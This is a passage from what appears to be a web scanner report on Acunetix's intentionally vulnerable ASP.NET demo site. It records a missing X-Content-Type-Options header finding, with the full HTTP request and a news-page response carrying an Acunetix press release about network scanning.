iBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 